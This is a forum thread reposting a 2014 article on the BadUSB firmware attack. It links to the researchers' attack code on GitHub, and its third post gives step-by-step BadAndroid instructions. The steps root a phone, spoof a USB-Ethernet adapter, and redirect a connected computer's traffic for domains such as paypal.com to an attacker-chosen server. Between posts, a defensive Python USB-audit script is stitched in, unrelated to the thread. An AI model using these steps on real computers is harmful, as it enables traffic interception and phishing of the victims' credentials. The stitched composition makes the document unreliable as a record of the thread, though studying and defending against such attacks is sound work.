
Thread: BadUSB the unpatchable malware code published on Github

  1. #1
    Larry-G (V.I.P, Donated Member) | Join Date: May 2010 | Posts: 32,542 | Thanks: 7,824 | Thanked 22,934 Times in 12,378 Posts

    BadUSB the unpatchable malware code published on Github

    BadUSB : The unpatchable and unfixable USB malware

    Exactly two months after researcher Karsten Nohl demonstrated an attack he called BadUSB to a standing-room-only crowd at the Black Hat security conference in Las Vegas, BadUSB was demonstrated again by two researchers, Adam Caudill and Brandon Wilson. Caudill and Wilson presented the vulnerability at the Derbycon 4.0 conference last week in Louisville.


    What is BadUSB?

    The malware, which is dubbed BadUSB, reprograms embedded firmware to give USB devices new, covert and most powerful capabilities. In a demo at the Black Hat security conference in Las Vegas, a USB drive was infected and showed its ability to act as a keyboard that surreptitiously types malicious commands into attached computers.
    Another USB was similarly reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations. The demo showed that similar hacks could work against Android phones when attached to targeted computers. The malware is so huge that it can work on almost any USB-linked device, like web cams, keyboards, smart phones etc.


    BadUSB on Github

    Researchers Wilson and Caudill reverse-engineered USB firmware and reprogrammed it to launch various attacks. They then put the code for BadUSB on Github with the intent of letting all users know about its effects.
    “The belief we have is that all of this should be public. It shouldn’t be held back. So we’re releasing everything we’ve got,” Caudill told the Derbycon audience on Friday. “This was largely inspired by the fact that [SR Labs] didn’t release their material. If you’re going to prove that there’s a flaw, you need to release the material so people can defend against it.”
    Caudill and Wilson discussed various scenarios where BadUSB can be used. Prominent among them, and the deadliest, is for the USB device to emulate a keyboard and issue commands on behalf of a logged-in user to exfiltrate data or install malware.


    Unpatchable!!!

    BadUSB remains unpatchable at the moment. The reason, according to both researchers, is that the USB controller chips in peripherals can be reprogrammed to spoof other devices and there’s little or no protection to prevent anyone from doing so. They also feel that, since USBs are mass manufactured these days and this proves that anyone can input the code to insert the malware and take command of any system, perhaps the USB manufacturers will be under pressure to fix it soon.
    “If the only people who can do this are those with significant budgets, the manufacturers will never do anything about it,” Caudill told Wired. “You have to prove to the world that it’s practical, that anyone can do it…That puts pressure on the manufacturers to fix the real issue.”
    The researchers also hope that putting the code on Github would encourage companies and white hat researchers to find a fix for the malware.

    Code:
    http://www.techworm.net/2014/10/badusb-malware-code-on-github.html






    My posts contain my own personal thoughts and opinions, they do not represent those of any organisation or group but my own.

    If you don't like what I post, Don't read it.

    SIMPLES.

  2. The Following User Says Thank You to Larry-G For This Useful Post:

    seame (07-10-14)
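
A defensive check for the behaviour the post above describes (a USB drive that starts acting as a keyboard or network card), added here as an example; it is not from the article, the researchers or the poster. It compares the interface classes each device enumerates with against an approved baseline. The device records, ids and baseline are constructed sample data; on Linux the same fields can be read from sysfs (`idVendor`, `idProduct`, `serial`, `bInterfaceClass`).

```python
# Added example: flag USB devices whose interface classes changed or mix roles.
# All device records below are constructed sample data, not real captures.

HID, STORAGE = 0x03, 0x08            # USB-IF interface class codes
NETWORK = {0x02, 0x0A, 0xE0}         # CDC control, CDC data, wireless/RNDIS
RISKY = NETWORK | {HID}              # classes that can type or carry traffic
NAMES = {0x02: "cdc-comm", 0x03: "hid", 0x08: "mass-storage",
         0x0A: "cdc-data", 0xE0: "wireless/rndis"}


def device_key(dev):
    """Identity used for the baseline: vendor id, product id, serial string."""
    return (dev["vid"], dev["pid"], dev.get("serial", ""))


def audit(devices, baseline):
    """Return (device_key, reason) findings; baseline maps key -> approved classes."""
    findings = []
    for dev in devices:
        key, classes = device_key(dev), set(dev["interfaces"])
        known = baseline.get(key)
        if known is None:
            if classes & RISKY:
                findings.append((key, "unapproved input/network device"))
        elif classes - known:
            extra = ", ".join(NAMES.get(c, hex(c)) for c in sorted(classes - known))
            findings.append((key, "new interface class since approval: " + extra))
        if STORAGE in classes and classes & RISKY:
            findings.append((key, "storage device also exposes input/network"))
    return findings


BASELINE = {  # constructed: approved devices and the classes they had
    ("1234", "0001", ""): {HID},                # the desk keyboard
    ("1234", "0002", "SAMPLE001"): {STORAGE},   # a known flash drive
}
SAMPLE = [  # constructed enumeration snapshot
    {"vid": "1234", "pid": "0001", "interfaces": [HID]},
    {"vid": "1234", "pid": "0002", "serial": "SAMPLE001", "interfaces": [STORAGE, HID]},
    {"vid": "1234", "pid": "0003", "serial": "X", "interfaces": [0xE0, 0x0A]},
    {"vid": "1234", "pid": "0004", "serial": "Y", "interfaces": [STORAGE]},
]

if __name__ == "__main__":
    for key, reason in audit(SAMPLE, BASELINE):
        print(":".join(key), "-", reason)
```

Reprogrammed firmware can report any vendor id, product id or serial it likes, so a check like this catches role changes and unapproved devices only; it does not verify the firmware itself.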

  3. #2
    Larry-G
    For those curious enough to go looking for this on GITHUB, here you go.

    Code:
    https://github.com/adamcaudill/Psychson

  4. The Following User Says Thank You to Larry-G For This Useful Post:

    seame (07-10-14)

  5. #3
    Larry-G
    Proof-of-concept for Android devices that you can use to test your defenses: BadAndroid-v0.1.


    #############################
    ## BadAndroid v0.1 ##
    ## Android USB-Ethernet ##
    ## Emulation and DNS MitM ##
    #############################
    ## Jakob Lell ##
    ## <jakob@srlabs.de> ##
    #############################


    Purpose: Spoof a USB-Ethernet adapter from an Android phone to capture network traffic from a connected computer. Then change some DNS answers to redirect traffic.


    #1. Root your phone, make sure it's connected to the Internet


    #2. Install busybox (e.g., using the stericson busybox installer)


    #3. Create a hosts file with the domains you want to redirect and with your server’s IP; such as:
    1.2.3.4 paypal.com www.paypal.com


    #4. Copy the scripts and hosts file to the phone:
    adb push bad.sh /data/local/tmp/
    adb push cleanup.sh /data/local/tmp/
    adb push hosts /data/local/tmp/


    #5. Install and open a terminal on the phone (e.g. jackpal/Android-Terminal-Emulator) and get a root shell: /system/xbin/su


    #6. Run bad.sh: sh /data/local/tmp/bad.sh


    #7. Attach the phone to the Windows or Linux computer you want to attack; web traffic should now go through the phone with partial redirection of those domains in the hosts file


    #8. When you are finished with the attack, either reboot your phone or run the cleanup.sh script to restore the standard Android USB functionality